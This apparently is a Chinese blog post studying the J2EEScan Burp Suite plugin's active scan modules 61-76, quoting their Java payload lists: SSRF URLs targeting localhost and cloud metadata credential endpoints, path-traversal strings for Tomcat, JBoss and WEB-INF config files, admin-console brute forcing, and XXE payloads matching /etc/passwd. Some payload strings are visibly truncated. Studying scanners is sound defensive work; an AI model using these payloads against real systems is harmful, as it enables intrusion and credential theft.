【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(61-76)

【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(61-70)

前言

插件开发学习第11套。前置文章：

【BurpSuite】插件开发学习之Log4shell
【BurpSuite】插件开发学习之Software Vulnerability Scanner
【BurpSuite】插件开发学习之dotnet-Beautifier
【BurpSuite】插件开发学习之active-scan-plus-plus
【BurpSuite】插件开发学习之J2EEScan（上）-被动扫描
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(31-40)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(41-50)
【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(51-60)

分析

【61】SSRFScanner

地址：

    private static final List<byte[]> SSRF_INJECTION_TESTS = Arrays.asList(
            "gopher://localhost:22/".getBytes(),
            "http://[::]:22/".getBytes(),
            "ftp://[::]:22/".getBytes(),
            "ftp://localhost:22/".getBytes(),
            "ftp://0.0.0.0:22/".getBytes(),
            "ftp://0177.0000.0000.0001:22".getBytes(),
            "ftp://0x7f.1:22/".getBytes(),
            "http://spoofed.burpcollaborator.net:22/".getBytes()
    );

这是打本地的22端口
match就是

    private static final byte[] GREP_STRING = "OpenSSH".getBytes();

然后就是访问云上各种元数据

  private static final Map<byte[], Pattern> SSRF_CLOUD_INJECTION_TESTS = new HashMap<byte[], Pattern>() {
        {
            put("http://169.254.169.254/latest/meta-data/".getBytes(), Pattern.compile("identity-credentials", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
            put("http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token".getBytes(), Pattern.compile("token_type", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        
        }

这里注释给出了一些情况

     *
     * Source AWS
     * http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
     *
     * http://169.254.169.254/latest/user-data
     * http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLENAME]
     * http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLENAME] 
     * http://169.254.169.254/latest/meta-data/ami-id
     * http://169.254.169.254/latest/meta-data/reservation-id
     * http://169.254.169.254/latest/meta-data/hostname
     * http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
     * http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
     *
     * # AWS - Dirs http://169.254.169.254/
     * http://169.254.169.254/latest/meta-data/
     * http://169.254.169.254/latest/meta-data/public-keys/
     *

互联网上也有很多总结

http://cn-sec.com/archives/840191.html

【62】StatusServlet

payload

    private static final List<String> STATUS_SERVLET_PATHS = Arrays.asList(
            "/status?full=true",
            "/web-console/status?full=true",
            "/server-status?full=true"
    );

如果是401

           if (statusInfo.getStatusCode() == 401) {

则认为是存在登录接口
然后就是弱口令测试

                        WeakPasswordBruteforcer br = new WeakPasswordBruteforcer();

如果match到了200且有如下返回，说明存在不同类型服务信息泄露

    private static final byte[] GREP_STRING_J2EE = "Status Servlet".getBytes();
        private static final byte[] GREP_STRING_HTTPD = "Apache Server Status".getBytes();

【63】TomcatHostManager

tomcat管理后台泄露，比较常见了

private static final List<String> TOMCAT_HOST_MANAGER_PATHS = Arrays.asList(
            "/host-manager/html?j2eescan"
    );

爆破

【64】TomcatManager

同63

    private static final List<String> TOMCAT_MANAGER_PATHS = Arrays.asList(
            "/manager/html"
    );

【65】UndertowTraversal CVE-2014-7816

Jboss的问题
payload

    private static final List<String> JBOSS_PATHS = Arrays.asList(
            "/..\\\\standalone\\\\configuration\\\\standalone.xml"
    );

match的是读取的xml

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            ".getBytes()
    );
 

【66】URINormalizationTomcat

未授权访问tomcat

    private static final List<String> TOMCAT_URI_NORMALIZATIONS = Arrays.asList(
            "..;/manager/html",
            "..;/"
    );

眼熟啊，shiro的未授权访问也是这么绕的

【67】UTF8ResponseSplitting

好像又是个crlf
payload

    private static final byte[] INJ = "%E5%98%8A%E5%98%8DX-Injection:%20test".getBytes();

match返回包

        if (getResponseHeaderValue(responseInfo, "X-Injection") != null) {

【68】WebInfInformationDisclosure

payload

    private static final List<String> WEBINF_PATHS = Arrays.asList(
            "/WEB-INF./web.xml",
            "//WEB-INF/web.xml",
            "/WEB-INF/web.xml",
            "/static/WEB-INF/web.xml", // CVE-2014-0053 
            "/forward:/WEB-INF/web.xml", // spring issue
            "/web-inf./web.xml", // CVE-2016-0793 https://bugzilla.redhat.com/show_bug.cgi?id=1305937
            "/.//WEB-INF/web.xml",
            "/./WEB-INF/web.xml"
    );

match

 private static final byte[] GREP_STRING = ".getBytes();

任意文件读取也可以多尝试此类文件。

【69】WeblogicConsole

登录接口path

    private static final List<String> WEBLOGIC_CONSOLE_PATHS = Arrays.asList(
            "/console/login/LoginForm.jsp;ADMINCONSOLESESSION=TynPs0LnRt9BLctc13WMYmhQpsp3cG1LCNDp78TJyDfHMWhC4Kln!1225542286"
    );

match

    private static final List<byte[]> GREP_WEBLOGIC_STRINGS = Arrays.asList(
            "".getBytes()
    );

则存在漏洞

这是个任意文件上传的测试页面，不需要权限控制

【74】XInclude 任意文件上传

payload一把锁

    private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
            "".getBytes());  

【75】XXEModule

payload

    private static final String XXE_DTD_DEFINITION = "]>";

这是可回显的，看着像是通用性的一个插件

【76】XXEParameterModule

payload

    private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
            "]>&xxe;".getBytes(),
            // https://twitter.com/Agarri_FR/status/656440244116574208
            " %dtd;]>]]>".getBytes()
            );

一样的
一个是打did一个是直接解析回显
match

    private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
            Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));

但通常打did不用file测试，用http协议会比较常见可以打DNSlog